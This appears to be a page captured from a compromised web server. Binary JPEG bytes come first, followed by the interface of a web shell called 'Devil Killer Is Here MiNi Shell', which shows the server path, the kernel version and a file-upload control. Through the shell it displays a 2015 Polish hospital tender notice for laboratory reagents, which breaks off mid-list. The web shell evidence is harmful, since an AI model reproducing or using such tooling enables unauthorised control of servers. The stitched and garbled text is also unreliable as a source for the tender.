JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151029/158007-N-2015.html

<p class="kh_header"><b>Garwolin: Dostawa odczynników, kalibratorów, kontroli, materiałów zużywalnych wraz z dzierżawą sprzętu do laboratorium SP ZOZ w Garwolinie</b><br>
<b>Numer ogłoszenia: 158007 - 2015; data zamieszczenia: 29.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Lubelska 50, 08-400 Garwolin, woj. mazowieckie, tel. 25 6844700 w.619; 684 37 08, faks 25 6844700 w.619; 684 37 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników, kalibratorów, kontroli, materiałów zużywalnych wraz z dzierżawą sprzętu do laboratorium SP ZOZ w Garwolinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa odczynników, kalibratorów, kontroli, materiałów zużywalnych wraz z dzierżawą sprzętu do laboratorium Szpitala Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Garwolinie przy ul. Lubelskiej 50 w okresie 12 miesięcy.
2. Zamawiający dopuszcza składanie ofert częściowych, gdzie zadanie (pakiet) stanowi:
Zadanie nr 1 Krążki antybiotykowe i diagnostyczne;
Zadanie nr 2 Mikrobiologiczne odczynniki diagnostyczne;
Zadanie nr 3 Odczynniki mikrobiologiczne do hodowli, różnicowania oraz  identyfikacji drobnoustrojów i mechanizmów oporności na antybiotyki;
Zadanie nr 4 Odczynniki do aparatów: VITEK 2 compact,  BacT_ALERT oraz  PREVI Color Gram wraz z przeglądami okresowymi;
Zadanie nr 5 Sprzęt laboratoryjny;
Zadanie nr 6 Testy do diagnostyki laboratoryjnej;
Zadanie nr 7 Dostawa odczynników i artykułów do diagnostyki medycznej;
Zadanie nr 8 Dostawa odczynników, systemu kontroli do posiadanego aparatu SYSMEX XS-1000i wraz z dzierżawą analizatora beckup 5 DIFF do badań hematologicznych i okresowymi przeglądami;
Zadanie nr 9 Dostawa odczynników do posiadanego sprzętu firmy DiaMed.
3. Oferta może obejmować całość zamówienia lub wybrane pakiety, a jeżeli pakiet obejmuje więcej niż jedną pozycję oferta dla swojej ważności w tym pakiecie musi być złożona na wszystkie pozycje.
4. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w postępowaniu zostaną odrzucone.
5. Zamawiający nie dopuszcza składania ofert wariantowych.
6. Oferta powinna obejmować kompletną (z punktu widzenia celu, któremu ma służyć) realizację zamówienia.
7. Szczegółowy opis przedmiotu zamówienia zawarty jest w formularzu asortymentowo-cenowym - załącznik nr 2 do SIWZ.
8. Wykonawca wraz ze złożoną ofertą winien dostarczyć bezpłatne próbki oferowanego asortymentu w ilościach określonych w formularzu asortymentowo-cenowym w celu dokonania weryfikacji oferowanych towarów z opisem przedmiotu zamówienia (w odpowiednim zakresie) - dotyczy zadania nr 1, 3 i 9.
9. Każda próbka powinna zawierać dołączony opis z numerem wskazującym, której pozycji przetargowej dotyczy. 
10. Zamawiający wymaga właściwe opakowanie i oznakowanie na opakowaniu w języku polskim.
11. Wykonawca zobowiązany jest do jednoznacznego określenia zaoferowanych w ofercie produktów, charakteryzując je poprzez wskazanie producentów produktów, ich nazw handlowych i numerów katalogowych.
Uwaga: W przypadku, gdy numer katalogowy nie jest stosowany należy podać symbol, bądź skrót pozwalający na jednoznaczną identyfikację danego produktu, który mógłby być stosowany do zamówień w przypadku zawarcia umowy z wybranym Wykonawcą (dot. formularza asortymentowo - cenowego).
12. W przypadku opisania przedmiotu zamówienia przez wskazanie nazw i pochodzenia, Zamawiający dopuszcza złożenie oferty na materiały równoważne. Za równoważne Zamawiający uzna materiały o parametrach takich samych lub lepszych od pierwowzoru, posiadające minimum funkcje, zastosowanie i przeznaczenie jakie posiada pierwowzór. Udowodnienie równoważności będzie należało do Wykonawcy.
13. Oferowane odczynniki, kalibratory i materiały zużywalne muszą spełniać wymogi Ustawy z dnia 20 maja 2010 r. z późn. zm. o wyrobach medycznych oraz muszą posiadać kartę charakterystyki. (Kartę charakterystyki należy dołączyć do oferty) - (jeżeli dotyczy).
14. Oferowany asortyment winien posiadać termin ważności od daty dostawy odpowiednio:
zadanie nr 1 	- minimum 12 miesięcy;
zadanie nr 2	- podłoża na płytkach zawierające krew (minimum 4-5 tygodni),
- podłoża na płytkach bez krwi i wybiórcze (minimum 4-8 tygodni),
- pozostałe odczynniki (minimum 6 miesięcy);
zadanie nr 3 	- podłoża na płytkach zawierające krew (minimum 4-5 tygodni),
- podłoża na płytkach bez krwi i wybiórcze (minimum 4-8 tygodni),
- pozostałe odczynniki (minimum 6 miesięcy);
zadanie nr 4 	- minimum 6 miesięcy;
zadanie nr 5 	- minimum 12 miesięcy;
zadanie nr 6 	- minimum 6 miesięcy;
zadanie nr 7 	- minimum 6 miesięcy;
zadanie nr 8 	- odczynniki minimum 6 miesięcy,
 - kontrole minimum 6 tygodni;
zadanie nr 9 	- odczynniki i karty minimum 6 miesięcy,
 - kontrole i krwinki minimum 6 tygodni.
15. Termin dostawy odczynników, kontroli, materiałów zużywalnych w ciągu 72 godzin od daty otrzymania zamówienia (w dni robocze).
16. Oferowany analizator musi być zgłoszony do rejestru wyrobów medycznych w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów biobójczych i posiadać deklarację zgodności (CE) oferowanego wyrobu.
17. Wymagany okres gwarancji aparatu - przez cały okres trwania umowy (dotyczy zadania nr 8).
18. Termin dostawy analizatora i przekazania do eksploatacji w ciągu 7 dni od daty podpisania umowy dzierżawy. (dotyczy zadania nr 8).
19. Wykonawca zapewni bezpłatnie przeglądy i kalibracje jeżeli takich wymaga analizator w okresie obowiązywania umowy.
20. Wykonawca dostarczy analizator do bezpośredniego odbiorcy tj. Laboratorium Szpitala w Garwolinie ul. Lubelska 50 na własny koszt.
21. Wykonawca winien przeprowadzić bezpłatne szkolenia dla personelu w zakresie obsługi aparatu.
22. Aparat winien być sprawny technicznie, dopuszczony do użytkowania w placówkach służby zdrowia.
23. Wykonawca dostarczy bezpośredniemu Odbiorcy instrukcje obsługi aparatu w języku polskim po podpisaniu umowy.
24. Wykonawca na własny koszt i ryzyko winien dostarczyć przedmiot zamówienia do siedziby Zamawiającego.
25. Wykonawca winien dołączyć do oferty materiały informacyjne - pełne aktualne katalogi producenta tłumaczone na język polski, foldery, specyfikacje techniczne, informacje od producenta, potwierdzające, że oferowane produkty są zgodne z opisem przedmiotu zamówienia z zaznaczonymi pozycjami (zakreślone z opisem: nr zadania i nr pozycji).
26. Zamawiający zastrzega sobie prawo zmniejszenia zakresu przedmiotu umowy w części dotyczącej ilości w zależności od potrzeb Zamawiającego i odpowiednio do warunków kontraktu zawartego z NFZ lub wskazań medycznych o maksymalnie 20 % bez prawa dochodzenia roszczeń z tego tytułu przez Wykonawcę. 
27. Zamawiający zastrzega sobie prawo zwiększenia ilości jednej pozycji, kompensując to zmniejszeniem ilości innej pozycji w obrębie danej części zamówienia, z zachowaniem cen jednostkowych zawartych w formularzu asortymentowo-cenowym. Kompensacja nie może zmienić całkowitej wartości umowy.
28. W przypadku szczególnych okoliczności, takich jak wstrzymanie produkcji, strony dopuszczają możliwość zmiany asortymentu w ramach zaoferowanej grupy asortymentowej o tej samej lub wyższej jakości i parametry oraz zakresu działania w cenie nie wyższej niż w ofercie.
29. Zamawiający wymaga stałość cen ofertowych przez cały okres od dnia podpisania umowy. Ponadto dopuszcza się zmiany cen w następujących przypadkach:
a) obniżenia cen;
b) zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian;
c) zmian stawek celnych wprowadzonych decyzjami odnośnych władz;
30. Należność za usługę płacona będzie przelewem w terminie 30 - 60 dni od daty otrzymania prawidłowo wystawionej faktury (zgodnie ze złożoną ofertą)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana przez Komisję Przetargową wg formuły spełnia nie spełnia, w oparciu o dokumenty oświadczenia przedłożone przez Wykonawcę zgodnie z wymaganiami Zamawiającego, określonymi w SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda złożenia wraz z ofertą następujących dokumentów:
1. oświadczenie, iż oferowane wyroby medyczne zostały dopuszczone do obrotu na mocy obowiązujących przepisów - posiadają wpisy i świadectwa wydane przez uprawnione organy, zgodnie z ustawą o wyrobach medycznych (dotyczy wyrobów medycznych):, tj.:
- certyfikat zgodności - dokument wydany przez jednostkę notyfikowaną w zakresie wyrobów poświadczający przeprowadzenie procedury oceny zgodności, potwierdzającej, że należycie zidentyfikowany wyrób, jego projekt, typ, proces wytwarzania, sterylizacja lub kontroli i badań końcowych jest zgodny z wymaganiami zasadniczymi, (jeśli dotyczy wyrobu);
- deklaracja zgodności - oświadczenie wytwórcy lub jego autoryzowanego przedstawiciela, stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z wymaganiami zasadniczymi;
- dokumenty potwierdzające dokonanie zgłoszenia lub powiadomienia Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (o wprowadzeniu do obrotu lub do używania wyrobu) bądź dokument potwierdzający dokonanie przeniesienia danych z dotychczasowego rejestru/ druk zgłoszenia, powiadomienia, wniosek o przeniesienie danych lub urzędowe potwierdzenie wpisu do bazy danych prowadzone przez ww. Prezesa/, jeśli przepisy ustawy o wyrobach medycznych wymagają zgłoszenia, powiadomienia lub przeniesienia danych, a w przypadku wyrobów medycznych niepodlegających temu obowiązkowi - oświadczenie o przyczynach braku zgłoszenia/ powiadomienia/ przeniesienia danych, z odpowiednim odwołaniem się do przepisów ustawy z dnia 20 maja 2010 r. o wyrobach medycznych;
Wykonawca przedstawi ww. dokumenty na żądanie Zamawiającego.
2. certyfikat ISO 13485 i ISO 9001 (dotyczy zadania nr 1);
3. karty charakterystyki substancji niebezpiecznych (dotyczy zadania nr 1);
4. pozytywna opinia Krajowego Ośrodka Referencyjnego ds. Lekowrażliwości Drobnoustrojów (dotyczy zadania nr 1 i 2);
5. certyfikat analizy (dotyczy zadania nr 1);
6. certyfikat kontroli jakości (dotyczy zadania nr 2);
7. kolorowe ulotki (dotyczy zadania nr 3);
8. materiały informacyjne - pełne aktualne katalogi producenta tłumaczone na język polski, foldery, specyfikacje techniczne, informacje od producenta, potwierdzające, że oferowane produkty są zgodne z opisem przedmiotu zamówienia.
Zamawiający wymaga, aby w/w dokumenty potwierdzające zgodność z wymaganiami określonymi przez Zamawiającego były odpowiednio oznaczone, tj. Wykonawcy powinni w prawym górnym rogu każdego dokumentu oznaczyć, którego zadania oraz której pozycji Formularza asortymentowo-cenowego dotyczy dokument.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz OFERTA - załącznik nr 1 do SIWZ.
2. Formularz asortymentowo-cenowy - załącznik nr 2 do SIWZ.
3. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ.
4. Oświadczenie Wykonawcy o braku podstaw do wykluczenia - załącznik 4 do SIWZ.
5. Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.) albo informację o tym, że nie należy do grupy kapitałowej (wzór stanowi załącznik nr 5 do SIWZ).
6. Wykaz podwykonawców - załącznik nr 6 do SIWZ.
7. Parafowany na każdej stronie formularz umowy - załącznik nr 7 do SIWZ.
8. Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych przez Wykonawcę.
9. W przypadku złożenia oferty przez kilka podmiotów występujących wspólnie (konsorcjum), należy złożyć pełnomocnictwo zawierające oświadczenia woli wszystkich członków konsorcjum, wskazujące na osobę umocowaną (np. lider, radca prawny, etc.) do reprezentowania przedsiębiorców w udziale w określonym postępowaniu o zamówienie publiczne i do ich podpisywania w jego imieniu umów. Dokument niniejszy winien wyliczać wszystkich Wykonawców wraz z ich podpisami. Oferta konsorcjum winna zawierać dokumenty, o których mowa w pkt. VI SIWZ każdego z członków konsorcjum osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w poniższym zakresie:
a) obniżenia cen;
b) zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian;
c) zmian stawek celnych wprowadzonych decyzjami odnośnych władz;
d) zmiany asortymentu;
e) zmiany sposobu konfekcjonowania;
f) niewyczerpania przez okres trwania umowy ilości asortymentu określonego w formularzu asortymentowo - cenowym. W tym przypadku Zamawiający przewiduje możliwość dokonania zmiany umowy poprzez przedłużenie czasu jej trwania na dalszy czas oznaczony;
g) zmniejszenie wynagrodzenia, w przypadku obniżenia przez Wykonawcę ceny przedmiotu umowy;
h) zmiany podmiotowe, m.in..: zmiana nazwy, zmiana formy prawnej, zmiana siedziby, zmiana osób reprezentujących strony - Wykonawca zobowiązany jest do niezwłocznego pisemnego powiadomienia Zamawiającego o ich zaistnieniu oraz dostarczenia odpowiednich dokumentów potwierdzających zmianę.
Okoliczności mogące stanowić podstawę zmiany umowy powinny być szczegółowo uzasadnione i udokumentowane przez stronę występującą z propozycją zmiany umowy.
Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Garwolinie, ul. Lubelska 50, 08-400 Garwolin, I piętro, pok. 136.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2015 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Garwolinie, ul. Lubelska 50, 08-400 Garwolin, II piętro, Sekretariat Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Krążki antybiotykowe i diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krążki antybiotykowe do oznaczania lekooporności drobnoustrojów			
1	Amikacyna 30 ?g	1szt.	1500
2	Amoksycylina/kwas klawulanowy (2/1)  3?g	1szt.	200
3	Amoksycylina/kwas klawulanowy (20/10)  30?g	1szt.	2000
4	Ampicylina 2 ?g	1szt.	300
5	Ampicylina 10 ?g	1szt.	1000
6	Ampicylina/sulbactam (10/10)  20?g	1szt.	600
7	Aztreonam 30 ?g	1szt.	50
8	Azytromycyna 15 ?g	1szt.	50
9	Cefaklor 30 ?g	1szt.	50
10	Cefaleksyna 30 ?g	1szt.	300
11	Cefazolina 30 ?g	1szt.	50
12	Cefepim 30 ?g	1szt.	500
